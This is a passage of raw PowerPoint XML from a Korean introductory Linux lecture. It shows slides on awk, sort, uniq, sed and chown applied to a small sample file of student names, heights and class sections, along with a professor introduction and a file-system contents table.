                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t> 방향으로 검색</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찾은 문자 중에서 다음 문자로 이동</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N,</a:t>
                      </a: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rPr>
                        <a:t>shift + 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찾은 문자 중에서 이전 문자로 이동</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/Theory/T2/27</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t># awk : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>문장 중 특정 단어로의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>split</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vi </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>awk_test</a:t>
              </a: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r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>영희</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>:165:1</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>분반</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>철수</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>:168:3</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>분반</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>범수</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>:178:2</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>분반</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>기범</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>:175:3</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>분반</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>현덕</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>:175:2</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>분반</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>예은</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>:166:1</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>분반</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>지훈</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>:178:2</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>분반</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>용범</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>:175:2</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>분반</a:t>
              </a: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wq</a:t>
              </a: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$2}’</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$3}’</a:t>
              </a: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p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pP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/Theory/T2/28</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t># sort : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>정렬</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1838378"/>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$2}' | sort</a:t>
              </a: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sort</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sort -t: -k1</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sort -t: -k3</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sort -t: -k2</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="2E75B6"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pP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sort -t: -k2 -r</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/Intro</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>교수소개</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a:t>2019</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="110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a:t>국방과학연구소</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400"/>
              <a:t>본부 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400"/>
              <a:t>부 파견</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="140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9</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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a:t>IEEE AI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400"/>
              <a:t>학회</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400"/>
              <a:t>논문 등록</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="140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a:t>서울 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400"/>
              <a:t>본부 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400"/>
              <a:t>부 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="140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a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>https://ieeexplore.ieee.org/document/8999252</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="140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/Theory/T2/29</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sz="4400" kern="0" spc="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>uniq</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중복이 없는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>sort</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1640052"/>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$2}’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$2}’ | </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>uniq</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> –c</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$2}’ | sort | </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>uniq</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> -c</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100"/>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100"/>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$3}’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$3}’ | </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>uniq</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> –c</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awk -F ":" '{print $3}’ | sort | </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>uniq</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> -c</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100"/>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pP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54165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/Theory/T2/30</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sed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t> : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>비대화형 편집기</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648422"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>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 cat </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>awk_test</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> | sed 'N;s/\n/ /’</a:t>
              </a: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pt-BR" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> cat awk_test | sed 'N;N;N;s/\n/ /g'</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="2E75B6"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>[</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>root@localhost</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> ~]#</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pt-BR" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> cat awk_test | sed 'N;N;N;s/\n/ /g;s/:/-/g'</a:t>
              </a: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5613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/Theory/T2/14</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4400" kern="0" spc="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>ch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" kern="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t> : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>특정 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>파일의 소유자 변경</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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138381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 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>리눅스 파일 시스템</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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7420"/>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 시스템 정의</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="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종류</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3" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>History</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 시스템 역사</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4" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>FSSTND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리눅스 파일시스템 표준</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hlinkClick r:id="rId5" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>T2</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>- </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>pwd,ls,cd</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 시스템 구조</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 시스템 타임스탬프</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Permission</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 시스템 권한</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9" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>Link</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파일 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>링킹</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t> 시스템</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10" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>Passwd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604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>파일 패스워드 구조</a:t>
                      </a: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/Theory/T3/Def </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>파일 시스템 이란</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Noto Sans"/>
              </a:rPr>
              <a:t>운영체제</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1" i="0">
                <a:effectLst/>
                <a:latin typeface="Noto Sans"/>
              </a:rPr>
              <a:t>가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1" i="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Noto Sans"/>
              </a:rPr>
              <a:t>파일</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1" i="0">
                <a:effectLst/>
                <a:latin typeface="Noto Sans"/>
              </a:rPr>
              <a:t>이나 자료를 쉽게 발견 및 접근할 수 있도록 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1" i="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Noto Sans"/>
              </a:rPr>
              <a:t>보관 또는 조직</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1" i="0">
                <a:effectLst/>
                <a:latin typeface="Noto Sans"/>
              </a:rPr>
              <a:t>하는 체제</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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Disk</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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endParaRPr lang="ko-KR" altLang="en-US" sz="110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OS</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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&lt;User&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="100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/Theory/T3/Def </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>파일 시스템 종류</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>F A T</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
              <a:t>File Allocation Table</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>파일을 할당한 정보를 테이블로 표현</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>구조가 간단</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
